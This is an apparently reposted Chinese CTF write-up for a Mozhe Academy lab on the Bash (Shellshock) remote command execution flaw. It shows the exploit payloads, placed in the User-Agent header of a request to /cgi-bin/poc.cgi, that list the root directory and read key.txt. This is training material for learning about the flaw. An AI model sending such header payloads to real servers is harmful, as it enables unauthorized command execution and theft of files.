[ 墨者学院 ] 命令执行——Bash漏洞分析溯源
生活随笔
收集整理的這篇文章主要介紹了
[ 墨者学院 ] 命令执行——Bash漏洞分析溯源
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
0x00.題目描述:
背景介紹
安全工程師"墨者"對一單位業務系統進行授權測試,在測試過程中,發現存在bash命令執行漏洞。
實訓目標
1、了解bash;
2、了解Bash遠程命令執行漏洞形成原因;
3、了解Bash遠程命令執行漏洞利用方法;
解題方向
找到poc.cgi文件
?
0x01.題目分析:
根據題目說明,在網上對Bash遠程命令執行漏洞進行了一番學習。
參考連接
freebuf:https://www.freebuf.com/vuls/44994.html
Seebug:https://www.seebug.org/vuldb/ssvid-88877
?
0x02.解題過程
通過網上的資料搜查,發現此漏洞存在的路徑多數在網頁/cgi-bin/下,結合題目給的提示,打開http://url/cgi-bin/poc.cgi
構造執行語句插入到請求頭的User-Agent頭里面
User-Agent: () { :;}; echo; /bin/ls /然后構造執行語句查看key.txt
User-Agent: () { :;}; echo; /bin/cat /key.txt轉載于:https://www.cnblogs.com/qtisec/p/11095444.html
總結
以上是生活随笔為你收集整理的[ 墨者学院 ] 命令执行——Bash漏洞分析溯源的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: python update()
- 下一篇: 在元素前面添加一个伪元素下边框